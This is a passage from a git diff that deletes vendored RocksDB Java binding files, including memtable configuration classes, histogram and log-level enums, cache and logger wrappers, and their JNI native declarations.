-/**
- * Marks a feature as experimental, meaning that it is likely
- * to change or even be removed/re-engineered in the future
- */
-@Documented
-@Retention(RetentionPolicy.SOURCE)
-@Target({ElementType.TYPE, ElementType.METHOD})
-public @interface Experimental {
-  String value();
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Filter.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Filter.java
deleted file mode 100644
index 011be20..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Filter.java
+++ /dev/null
@@ -1,35 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Filters are stored in rocksdb and are consulted automatically
- * by rocksdb to decide whether or not to read some
- * information from disk. In many cases, a filter can cut down the
- * number of disk seeks form a handful to a single disk seek per
- * DB::Get() call.
- */
-public abstract class Filter extends RocksObject {
-
-  protected Filter(final long nativeHandle) {
-    super(nativeHandle);
-  }
-
-  /**
-   * Deletes underlying C++ filter pointer.
-   *
-   * Note that this function should be called only after all
-   * RocksDB instances referencing the filter are closed.
-   * Otherwise an undefined behavior will occur.
-   */
-  @Override
-  protected void disposeInternal() {
-    disposeInternal(nativeHandle_);
-  }
-
-  @Override
-  protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/FlushOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/FlushOptions.java
deleted file mode 100644
index ce54a52..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/FlushOptions.java
+++ /dev/null
@@ -1,49 +0,0 @@
-package org.rocksdb;
-
-/**
- * FlushOptions to be passed to flush operations of
- * {@link org.rocksdb.RocksDB}.
- */
-public class FlushOptions extends RocksObject {
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  /**
-   * Construct a new instance of FlushOptions.
-   */
-  public FlushOptions(){
-    super(newFlushOptions());
-  }
-
-  /**
-   * Set if the flush operation shall block until it terminates.
-   *
-   * @param waitForFlush boolean value indicating if the flush
-   *     operations waits for termination of the flush process.
-   *
-   * @return instance of current FlushOptions.
-   */
-  public FlushOptions setWaitForFlush(final boolean waitForFlush) {
-    assert(isOwningHandle());
-    setWaitForFlush(nativeHandle_, waitForFlush);
-    return this;
-  }
-
-  /**
-   * Wait for flush to finished.
-   *
-   * @return boolean value indicating if the flush operation
-   *     waits for termination of the flush process.
-   */
-  public boolean waitForFlush() {
-    assert(isOwningHandle());
-    return waitForFlush(nativeHandle_);
-  }
-
-  private native static long newFlushOptions();
-  @Override protected final native void disposeInternal(final long handle);
-  private native void setWaitForFlush(long handle,
-      boolean wait);
-  private native boolean waitForFlush(long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HashLinkedListMemTableConfig.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HashLinkedListMemTableConfig.java
deleted file mode 100644
index d56c46c..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HashLinkedListMemTableConfig.java
+++ /dev/null
@@ -1,173 +0,0 @@
-package org.rocksdb;
-
-/**
- * The config for hash linked list memtable representation
- * Such memtable contains a fix-sized array of buckets, where
- * each bucket points to a sorted singly-linked
- * list (or null if the bucket is empty).
- *
- * Note that since this mem-table representation relies on the
- * key prefix, it is required to invoke one of the usePrefixExtractor
- * functions to specify how to extract key prefix given a key.
- * If proper prefix-extractor is not set, then RocksDB will
- * use the default memtable representation (SkipList) instead
- * and post a warning in the LOG.
- */
-public class HashLinkedListMemTableConfig extends MemTableConfig {
-  public static final long DEFAULT_BUCKET_COUNT = 50000;
-  public static final long DEFAULT_HUGE_PAGE_TLB_SIZE = 0;
-  public static final int DEFAULT_BUCKET_ENTRIES_LOG_THRES = 4096;
-  public static final boolean
-      DEFAULT_IF_LOG_BUCKET_DIST_WHEN_FLUSH = true;
-  public static final int DEFAUL_THRESHOLD_USE_SKIPLIST = 256;
-
-  /**
-   * HashLinkedListMemTableConfig constructor
-   */
-  public HashLinkedListMemTableConfig() {
-    bucketCount_ = DEFAULT_BUCKET_COUNT;
-    hugePageTlbSize_ = DEFAULT_HUGE_PAGE_TLB_SIZE;
-    bucketEntriesLoggingThreshold_ = DEFAULT_BUCKET_ENTRIES_LOG_THRES;
-    ifLogBucketDistWhenFlush_ = DEFAULT_IF_LOG_BUCKET_DIST_WHEN_FLUSH;
-    thresholdUseSkiplist_ = DEFAUL_THRESHOLD_USE_SKIPLIST;
-  }
-
-  /**
-   * Set the number of buckets in the fixed-size array used
-   * in the hash linked-list mem-table.
-   *
-   * @param count the number of hash buckets.
-   * @return the reference to the current HashLinkedListMemTableConfig.
-   */
-  public HashLinkedListMemTableConfig setBucketCount(
-      final long count) {
-    bucketCount_ = count;
-    return this;
-  }
-
-  /**
-   * Returns the number of buckets that will be used in the memtable
-   * created based on this config.
-   *
-   * @return the number of buckets
-   */
-  public long bucketCount() {
-    return bucketCount_;
-  }
-
-  /**
-   * <p>Set the size of huge tlb or allocate the hashtable bytes from
-   * malloc if {@code size <= 0}.</p>
-   *
-   * <p>The user needs to reserve huge pages for it to be allocated,
-   * like: {@code sysctl -w vm.nr_hugepages=20}</p>
-   *
-   * <p>See linux documentation/vm/hugetlbpage.txt</p>
-   *
-   * @param size if set to {@code <= 0} hashtable bytes from malloc
-   * @return the reference to the current HashLinkedListMemTableConfig.
-   */
-  public HashLinkedListMemTableConfig setHugePageTlbSize(
-      final long size) {
-    hugePageTlbSize_ = size;
-    return this;
-  }
-
-  /**
-   * Returns the size value of hugePageTlbSize.
-   *
-   * @return the hugePageTlbSize.
-   */
-  public long hugePageTlbSize() {
-    return hugePageTlbSize_;
-  }
-
-  /**
-   * If number of entries in one bucket exceeds that setting, log
-   * about it.
-   *
-   * @param threshold - number of entries in a single bucket before
-   *     logging starts.
-   * @return the reference to the current HashLinkedListMemTableConfig.
-   */
-  public HashLinkedListMemTableConfig
-      setBucketEntriesLoggingThreshold(final int threshold) {
-    bucketEntriesLoggingThreshold_ = threshold;
-    return this;
-  }
-
-  /**
-   * Returns the maximum number of entries in one bucket before
-   * logging starts.
-   *
-   * @return maximum number of entries in one bucket before logging
-   *     starts.
-   */
-  public int bucketEntriesLoggingThreshold() {
-    return bucketEntriesLoggingThreshold_;
-  }
-
-  /**
-   * If true the distrubition of number of entries will be logged.
-   *
-   * @param logDistribution - boolean parameter indicating if number
-   *     of entry distribution shall be logged.
-   * @return the reference to the current HashLinkedListMemTableConfig.
-   */
-  public HashLinkedListMemTableConfig
-      setIfLogBucketDistWhenFlush(final boolean logDistribution) {
-    ifLogBucketDistWhenFlush_ = logDistribution;
-    return this;
-  }
-
-  /**
-   * Returns information about logging the distribution of
-   *  number of entries on flush.
-   *
-   * @return if distrubtion of number of entries shall be logged.
-   */
-  public boolean ifLogBucketDistWhenFlush() {
-    return ifLogBucketDistWhenFlush_;
-  }
-
-  /**
-   * Set maximum number of entries in one bucket. Exceeding this val
-   * leads to a switch from LinkedList to SkipList.
-   *
-   * @param threshold maximum number of entries before SkipList is
-   *     used.
-   * @return the reference to the current HashLinkedListMemTableConfig.
-   */
-  public HashLinkedListMemTableConfig
-      setThresholdUseSkiplist(final int threshold) {
-    thresholdUseSkiplist_ = threshold;
-    return this;
-  }
-
-  /**
-   * Returns entries per bucket threshold before LinkedList is
-   * replaced by SkipList usage for that bucket.
-   *
-   * @return entries per bucket threshold before SkipList is used.
-   */
-  public int thresholdUseSkiplist() {
-    return thresholdUseSkiplist_;
-  }
-
-  @Override protected long newMemTableFactoryHandle() {
-    return newMemTableFactoryHandle(bucketCount_, hugePageTlbSize_,
-        bucketEntriesLoggingThreshold_, ifLogBucketDistWhenFlush_,
-        thresholdUseSkiplist_);
-  }
-
-  private native long newMemTableFactoryHandle(long bucketCount,
-      long hugePageTlbSize, int bucketEntriesLoggingThreshold,
-      boolean ifLogBucketDistWhenFlush, int thresholdUseSkiplist)
-      throws IllegalArgumentException;
-
-  private long bucketCount_;
-  private long hugePageTlbSize_;
-  private int bucketEntriesLoggingThreshold_;
-  private boolean ifLogBucketDistWhenFlush_;
-  private int thresholdUseSkiplist_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HashSkipListMemTableConfig.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HashSkipListMemTableConfig.java
deleted file mode 100644
index fe1779b..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HashSkipListMemTableConfig.java
+++ /dev/null
@@ -1,105 +0,0 @@
-package org.rocksdb;
-
-/**
- * The config for hash skip-list mem-table representation.
- * Such mem-table representation contains a fix-sized array of
- * buckets, where each bucket points to a skiplist (or null if the
- * bucket is empty).
- *
- * Note that since this mem-table representation relies on the
- * key prefix, it is required to invoke one of the usePrefixExtractor
- * functions to specify how to extract key prefix given a key.
- * If proper prefix-extractor is not set, then RocksDB will
- * use the default memtable representation (SkipList) instead
- * and post a warning in the LOG.
- */
-public class HashSkipListMemTableConfig extends MemTableConfig {
-  public static final int DEFAULT_BUCKET_COUNT = 1000000;
-  public static final int DEFAULT_BRANCHING_FACTOR = 4;
-  public static final int DEFAULT_HEIGHT = 4;
-
-  /**
-   * HashSkipListMemTableConfig constructor
-   */
-  public HashSkipListMemTableConfig() {
-    bucketCount_ = DEFAULT_BUCKET_COUNT;
-    branchingFactor_ = DEFAULT_BRANCHING_FACTOR;
-    height_ = DEFAULT_HEIGHT;
-  }
-
-  /**
-   * Set the number of hash buckets used in the hash skiplist memtable.
-   * Default = 1000000.
-   *
-   * @param count the number of hash buckets used in the hash
-   *    skiplist memtable.
-   * @return the reference to the current HashSkipListMemTableConfig.
-   */
-  public HashSkipListMemTableConfig setBucketCount(
-      final long count) {
-    bucketCount_ = count;
-    return this;
-  }
-
-  /**
-   * @return the number of hash buckets
-   */
-  public long bucketCount() {
-    return bucketCount_;
-  }
-
-  /**
-   * Set the height of the skip list.  Default = 4.
-   *
-   * @param height height to set.
-   *
-   * @return the reference to the current HashSkipListMemTableConfig.
-   */
-  public HashSkipListMemTableConfig setHeight(final int height) {
-    height_ = height;
-    return this;
-  }
-
-  /**
-   * @return the height of the skip list.
-   */
-  public int height() {
-    return height_;
-  }
-
-  /**
-   * Set the branching factor used in the hash skip-list memtable.
-   * This factor controls the probabilistic size ratio between adjacent
-   * links in the skip list.
-   *
-   * @param bf the probabilistic size ratio between adjacent link
-   *     lists in the skip list.
-   * @return the reference to the current HashSkipListMemTableConfig.
-   */
-  public HashSkipListMemTableConfig setBranchingFactor(
-      final int bf) {
-    branchingFactor_ = bf;
-    return this;
-  }
-
-  /**
-   * @return branching factor, the probabilistic size ratio between
-   *     adjacent links in the skip list.
-   */
-  public int branchingFactor() {
-    return branchingFactor_;
-  }
-
-  @Override protected long newMemTableFactoryHandle() {
-    return newMemTableFactoryHandle(
-        bucketCount_, height_, branchingFactor_);
-  }
-
-  private native long newMemTableFactoryHandle(
-      long bucketCount, int height, int branchingFactor)
-      throws IllegalArgumentException;
-
-  private long bucketCount_;
-  private int branchingFactor_;
-  private int height_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HistogramData.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HistogramData.java
deleted file mode 100644
index 11798eb..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HistogramData.java
+++ /dev/null
@@ -1,44 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-public class HistogramData {
-  private final double median_;
-  private final double percentile95_;
-  private final double percentile99_;
-  private final double average_;
-  private final double standardDeviation_;
-
-  public HistogramData(final double median, final double percentile95,
-      final double percentile99, final double average,
-      final double standardDeviation) {
-    median_ = median;
-    percentile95_ = percentile95;
-    percentile99_ = percentile99;
-    average_ = average;
-    standardDeviation_ = standardDeviation;
-  }
-
-  public double getMedian() {
-    return median_;
-  }
-
-  public double getPercentile95() {
-    return percentile95_;
-  }
-
-  public double getPercentile99() {
-    return percentile99_;
-  }
-
-  public double getAverage() {
-    return average_;
-  }
-
-  public double getStandardDeviation() {
-    return standardDeviation_;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HistogramType.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HistogramType.java
deleted file mode 100644
index 2d95f51..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/HistogramType.java
+++ /dev/null
@@ -1,98 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-public enum HistogramType {
-
-  DB_GET((byte) 0x0),
-
-  DB_WRITE((byte) 0x1),
-
-  COMPACTION_TIME((byte) 0x2),
-
-  SUBCOMPACTION_SETUP_TIME((byte) 0x3),
-
-  TABLE_SYNC_MICROS((byte) 0x4),
-
-  COMPACTION_OUTFILE_SYNC_MICROS((byte) 0x5),
-
-  WAL_FILE_SYNC_MICROS((byte) 0x6),
-
-  MANIFEST_FILE_SYNC_MICROS((byte) 0x7),
-
-  /**
-   * TIME SPENT IN IO DURING TABLE OPEN.
-   */
-  TABLE_OPEN_IO_MICROS((byte) 0x8),
-
-  DB_MULTIGET((byte) 0x9),
-
-  READ_BLOCK_COMPACTION_MICROS((byte) 0xA),
-
-  READ_BLOCK_GET_MICROS((byte) 0xB),
-
-  WRITE_RAW_BLOCK_MICROS((byte) 0xC),
-
-  STALL_L0_SLOWDOWN_COUNT((byte) 0xD),
-
-  STALL_MEMTABLE_COMPACTION_COUNT((byte) 0xE),
-
-  STALL_L0_NUM_FILES_COUNT((byte) 0xF),
-
-  HARD_RATE_LIMIT_DELAY_COUNT((byte) 0x10),
-
-  SOFT_RATE_LIMIT_DELAY_COUNT((byte) 0x11),
-
-  NUM_FILES_IN_SINGLE_COMPACTION((byte) 0x12),
-
-  DB_SEEK((byte) 0x13),
-
-  WRITE_STALL((byte) 0x14),
-
-  SST_READ_MICROS((byte) 0x15),
-
-  /**
-   * The number of subcompactions actually scheduled during a compaction.
-   */
-  NUM_SUBCOMPACTIONS_SCHEDULED((byte) 0x16),
-
-  /**
-   * Value size distribution in each operation.
-   */
-  BYTES_PER_READ((byte) 0x17),
-  BYTES_PER_WRITE((byte) 0x18),
-  BYTES_PER_MULTIGET((byte) 0x19),
-
-  /**
-   * number of bytes compressed.
-   */
-  BYTES_COMPRESSED((byte) 0x1A),
-
-  /**
-   * number of bytes decompressed.
-   *
-   * number of bytes is when uncompressed; i.e. before/after respectively
-   */
-  BYTES_DECOMPRESSED((byte) 0x1B),
-
-  COMPRESSION_TIMES_NANOS((byte) 0x1C),
-
-  DECOMPRESSION_TIMES_NANOS((byte) 0x1D),
-
-  READ_NUM_MERGE_OPERANDS((byte) 0x1E),
-
-  HISTOGRAM_ENUM_MAX((byte) 0x1F);
-
-  private final byte value;
-
-  HistogramType(final byte value) {
-    this.value = value;
-  }
-
-  public byte getValue() {
-    return value;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/IndexType.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/IndexType.java
deleted file mode 100644
index e0c113d..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/IndexType.java
+++ /dev/null
@@ -1,41 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * IndexType used in conjunction with BlockBasedTable.
- */
-public enum IndexType {
-  /**
-   * A space efficient index block that is optimized for
-   * binary-search-based index.
-   */
-  kBinarySearch((byte) 0),
-  /**
-   * The hash index, if enabled, will do the hash lookup when
-   * {@code Options.prefix_extractor} is provided.
-   */
-  kHashSearch((byte) 1),
-  /**
-   * A two-level index implementation. Both levels are binary search indexes.
-   */
-  kTwoLevelIndexSearch((byte) 2);
-
-  /**
-   * Returns the byte value of the enumerations value
-   *
-   * @return byte representation
-   */
-  public byte getValue() {
-    return value_;
-  }
-
-  private IndexType(byte value) {
-    value_ = value;
-  }
-
-  private final byte value_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/InfoLogLevel.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/InfoLogLevel.java
deleted file mode 100644
index 2c97991..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/InfoLogLevel.java
+++ /dev/null
@@ -1,48 +0,0 @@
-package org.rocksdb;
-
-/**
- * RocksDB log levels.
- */
-public enum InfoLogLevel {
-  DEBUG_LEVEL((byte)0),
-  INFO_LEVEL((byte)1),
-  WARN_LEVEL((byte)2),
-  ERROR_LEVEL((byte)3),
-  FATAL_LEVEL((byte)4),
-  HEADER_LEVEL((byte)5),
-  NUM_INFO_LOG_LEVELS((byte)6);
-
-  private final byte value_;
-
-  private InfoLogLevel(final byte value) {
-    value_ = value;
-  }
-
-  /**
-   * Returns the byte value of the enumerations value
-   *
-   * @return byte representation
-   */
-  public byte getValue() {
-    return value_;
-  }
-
-  /**
-   * Get InfoLogLevel by byte value.
-   *
-   * @param value byte representation of InfoLogLevel.
-   *
-   * @return {@link org.rocksdb.InfoLogLevel} instance.
-   * @throws java.lang.IllegalArgumentException if an invalid
-   *     value is provided.
-   */
-  public static InfoLogLevel getInfoLogLevel(final byte value) {
-    for (final InfoLogLevel infoLogLevel : InfoLogLevel.values()) {
-      if (infoLogLevel.getValue() == value){
-        return infoLogLevel;
-      }
-    }
-    throw new IllegalArgumentException(
-        "Illegal value provided for InfoLogLevel.");
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/IngestExternalFileOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/IngestExternalFileOptions.java
deleted file mode 100644
index 7343691..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/IngestExternalFileOptions.java
+++ /dev/null
@@ -1,125 +0,0 @@
-package org.rocksdb;
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-import java.util.List;
-
-/**
- * IngestExternalFileOptions is used by {@link RocksDB#ingestExternalFile(ColumnFamilyHandle, List, IngestExternalFileOptions)}
- */
-public class IngestExternalFileOptions extends RocksObject {
-
-  public IngestExternalFileOptions() {
-    super(newIngestExternalFileOptions());
-  }
-
-  /**
-   * @param moveFiles {@link #setMoveFiles(boolean)}
-   * @param snapshotConsistency {@link #setSnapshotConsistency(boolean)}
-   * @param allowGlobalSeqNo {@link #setAllowGlobalSeqNo(boolean)}
-   * @param allowBlockingFlush {@link #setAllowBlockingFlush(boolean)}
-   */
-  public IngestExternalFileOptions(final boolean moveFiles,
-      final boolean snapshotConsistency, final boolean allowGlobalSeqNo,
-      final boolean allowBlockingFlush) {
-    super(newIngestExternalFileOptions(moveFiles, snapshotConsistency,
-        allowGlobalSeqNo, allowBlockingFlush));
-  }
-
-  /**
-   * Can be set to true to move the files instead of copying them.
-   *
-   * @return true if files will be moved
-   */
-  public boolean moveFiles() {
-    return moveFiles(nativeHandle_);
-  }
-
-  /**
-   * Can be set to true to move the files instead of copying them.
-   *
-   * @param moveFiles true if files should be moved instead of copied
-   */
-  public void setMoveFiles(final boolean moveFiles) {
-    setMoveFiles(nativeHandle_, moveFiles);
-  }
-
-  /**
-   * If set to false, an ingested file keys could appear in existing snapshots
-   * that where created before the file was ingested.
-   *
-   * @return true if snapshot consistency is assured
-   */
-  public boolean snapshotConsistency() {
-    return snapshotConsistency(nativeHandle_);
-  }
-
-  /**
-   * If set to false, an ingested file keys could appear in existing snapshots
-   * that where created before the file was ingested.
-   *
-   * @param snapshotConsistency true if snapshot consistency is required
-   */
-  public void setSnapshotConsistency(final boolean snapshotConsistency) {
-    setSnapshotConsistency(nativeHandle_, snapshotConsistency);
-  }
-
-  /**
-   * If set to false, {@link RocksDB#ingestExternalFile(ColumnFamilyHandle, List, IngestExternalFileOptions)}
-   * will fail if the file key range overlaps with existing keys or tombstones in the DB.
-   *
-   * @return true if global seq numbers are assured
-   */
-  public boolean allowGlobalSeqNo() {
-    return allowGlobalSeqNo(nativeHandle_);
-  }
-
-  /**
-   * If set to false, {@link RocksDB#ingestExternalFile(ColumnFamilyHandle, List, IngestExternalFileOptions)}
-   * will fail if the file key range overlaps with existing keys or tombstones in the DB.
-   *
-   * @param allowGlobalSeqNo true if global seq numbers are required
-   */
-  public void setAllowGlobalSeqNo(final boolean allowGlobalSeqNo) {
-    setAllowGlobalSeqNo(nativeHandle_, allowGlobalSeqNo);
-  }
-
-  /**
-   * If set to false and the file key range overlaps with the memtable key range
-   * (memtable flush required), IngestExternalFile will fail.
-   *
-   * @return true if blocking flushes may occur
-   */
-  public boolean allowBlockingFlush() {
-    return allowBlockingFlush(nativeHandle_);
-  }
-
-  /**
-   * If set to false and the file key range overlaps with the memtable key range
-   * (memtable flush required), IngestExternalFile will fail.
-   *
-   * @param allowBlockingFlush true if blocking flushes are allowed
-   */
-  public void setAllowBlockingFlush(final boolean allowBlockingFlush) {
-    setAllowBlockingFlush(nativeHandle_, allowBlockingFlush);
-  }
-
-  private native static long newIngestExternalFileOptions();
-  private native static long newIngestExternalFileOptions(
-      final boolean moveFiles, final boolean snapshotConsistency,
-      final boolean allowGlobalSeqNo, final boolean allowBlockingFlush);
-  private native boolean moveFiles(final long handle);
-  private native void setMoveFiles(final long handle, final boolean move_files);
-  private native boolean snapshotConsistency(final long handle);
-  private native void setSnapshotConsistency(final long handle,
-      final boolean snapshotConsistency);
-  private native boolean allowGlobalSeqNo(final long handle);
-  private native void setAllowGlobalSeqNo(final long handle,
-      final boolean allowGloablSeqNo);
-  private native boolean allowBlockingFlush(final long handle);
-  private native void setAllowBlockingFlush(final long handle,
-      final boolean allowBlockingFlush);
-  @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/LRUCache.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/LRUCache.java
deleted file mode 100644
index 5e5bdee..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/LRUCache.java
+++ /dev/null
@@ -1,82 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Least Recently Used Cache
- */
-public class LRUCache extends Cache {
-
-  /**
-   * Create a new cache with a fixed size capacity
-   *
-   * @param capacity The fixed size capacity of the cache
-   */
-  public LRUCache(final long capacity) {
-    this(capacity, -1, false, 0.0);
-  }
-
-  /**
-   * Create a new cache with a fixed size capacity. The cache is sharded
-   * to 2^numShardBits shards, by hash of the key. The total capacity
-   * is divided and evenly assigned to each shard.
-   * numShardBits = -1 means it is automatically determined: every shard
-   * will be at least 512KB and number of shard bits will not exceed 6.
-   *
-   * @param capacity The fixed size capacity of the cache
-   * @param numShardBits The cache is sharded to 2^numShardBits shards,
-   *     by hash of the key
-   */
-  public LRUCache(final long capacity, final int numShardBits) {
-    super(newLRUCache(capacity, numShardBits, false,0.0));
-  }
-
-  /**
-   * Create a new cache with a fixed size capacity. The cache is sharded
-   * to 2^numShardBits shards, by hash of the key. The total capacity
-   * is divided and evenly assigned to each shard. If strictCapacityLimit
-   * is set, insert to the cache will fail when cache is full.
-   * numShardBits = -1 means it is automatically determined: every shard
-   * will be at least 512KB and number of shard bits will not exceed 6.
-   *
-   * @param capacity The fixed size capacity of the cache
-   * @param numShardBits The cache is sharded to 2^numShardBits shards,
-   *     by hash of the key
-   * @param strictCapacityLimit insert to the cache will fail when cache is full
-   */
-  public LRUCache(final long capacity, final int numShardBits,
-                  final boolean strictCapacityLimit) {
-    super(newLRUCache(capacity, numShardBits, strictCapacityLimit,0.0));
-  }
-
-  /**
-   * Create a new cache with a fixed size capacity. The cache is sharded
-   * to 2^numShardBits shards, by hash of the key. The total capacity
-   * is divided and evenly assigned to each shard. If strictCapacityLimit
-   * is set, insert to the cache will fail when cache is full. User can also
-   * set percentage of the cache reserves for high priority entries via
-   * highPriPoolRatio.
-   * numShardBits = -1 means it is automatically determined: every shard
-   * will be at least 512KB and number of shard bits will not exceed 6.
-   *
-   * @param capacity The fixed size capacity of the cache
-   * @param numShardBits The cache is sharded to 2^numShardBits shards,
-   *     by hash of the key
-   * @param strictCapacityLimit insert to the cache will fail when cache is full
-   * @param highPriPoolRatio percentage of the cache reserves for high priority
-   *     entries
-   */
-  public LRUCache(final long capacity, final int numShardBits,
-      final boolean strictCapacityLimit, final double highPriPoolRatio) {
-    super(newLRUCache(capacity, numShardBits, strictCapacityLimit,
-        highPriPoolRatio));
-  }
-
-  private native static long newLRUCache(final long capacity,
-      final int numShardBits, final boolean strictCapacityLimit,
-      final double highPriPoolRatio);
-  @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Logger.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Logger.java
deleted file mode 100644
index 9021259..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Logger.java
+++ /dev/null
@@ -1,111 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * <p>This class provides a custom logger functionality
- * in Java which wraps {@code RocksDB} logging facilities.
- * </p>
- *
- * <p>Using this class RocksDB can log with common
- * Java logging APIs like Log4j or Slf4j without keeping
- * database logs in the filesystem.</p>
- *
- * <strong>Performance</strong>
- * <p>There are certain performance penalties using a Java
- * {@code Logger} implementation within production code.
- * </p>
- *
- * <p>
- * A log level can be set using {@link org.rocksdb.Options} or
- * {@link Logger#setInfoLogLevel(InfoLogLevel)}. The set log level
- * influences the underlying native code. Each log message is
- * checked against the set log level and if the log level is more
- * verbose as the set log level, native allocations will be made
- * and data structures are allocated.
- * </p>
- *
- * <p>Every log message which will be emitted by native code will
- * trigger expensive native to Java transitions. So the preferred
- * setting for production use is either
- * {@link org.rocksdb.InfoLogLevel#ERROR_LEVEL} or
- * {@link org.rocksdb.InfoLogLevel#FATAL_LEVEL}.
- * </p>
- */
-public abstract class Logger extends AbstractImmutableNativeReference {
-
-  final long nativeHandle_;
-
-  /**
-   * <p>AbstractLogger constructor.</p>
-   *
-   * <p><strong>Important:</strong> the log level set within
-   * the {@link org.rocksdb.Options} instance will be used as
-   * maximum log level of RocksDB.</p>
-   *
-   * @param options {@link org.rocksdb.Options} instance.
-   */
-  public Logger(final Options options) {
-    super(true);
-    this.nativeHandle_ = createNewLoggerOptions(options.nativeHandle_);
-  }
-
-  /**
-   * <p>AbstractLogger constructor.</p>
-   *
-   * <p><strong>Important:</strong> the log level set within
-   * the {@link org.rocksdb.DBOptions} instance will be used
-   * as maximum log level of RocksDB.</p>
-   *
-   * @param dboptions {@link org.rocksdb.DBOptions} instance.
-   */
-  public Logger(final DBOptions dboptions) {
-    super(true);
-    this.nativeHandle_ = createNewLoggerDbOptions(dboptions.nativeHandle_);
-  }
-
-  /**
-   * Set {@link org.rocksdb.InfoLogLevel} to AbstractLogger.
-   *
-   * @param infoLogLevel {@link org.rocksdb.InfoLogLevel} instance.
-   */
-  public void setInfoLogLevel(final InfoLogLevel infoLogLevel) {
-      setInfoLogLevel(nativeHandle_, infoLogLevel.getValue());
-  }
-
-  /**
-   * Return the loggers log level.
-   *
-   * @return {@link org.rocksdb.InfoLogLevel} instance.
-   */
-  public InfoLogLevel infoLogLevel() {
-    return InfoLogLevel.getInfoLogLevel(
-        infoLogLevel(nativeHandle_));
-  }
-
-  protected abstract void log(InfoLogLevel infoLogLevel,
-      String logMsg);
-
-  /**
-   * Deletes underlying C++ slice pointer.
-   * Note that this function should be called only after all
-   * RocksDB instances referencing the slice are closed.
-   * Otherwise an undefined behavior will occur.
-   */
-  @Override
-  protected void disposeInternal() {
-    disposeInternal(nativeHandle_);
-  }
-
-  protected native long createNewLoggerOptions(
-      long options);
-  protected native long createNewLoggerDbOptions(
-      long dbOptions);
-  protected native void setInfoLogLevel(long handle,
-      byte infoLogLevel);
-  protected native byte infoLogLevel(long handle);
-  private native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MemTableConfig.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MemTableConfig.java
deleted file mode 100644
index 83cee97..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/MemTableConfig.java
+++ /dev/null
@@ -1,29 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-/**
- * MemTableConfig is used to config the internal mem-table of a RocksDB.
- * It is required for each memtable to have one such sub-class to allow
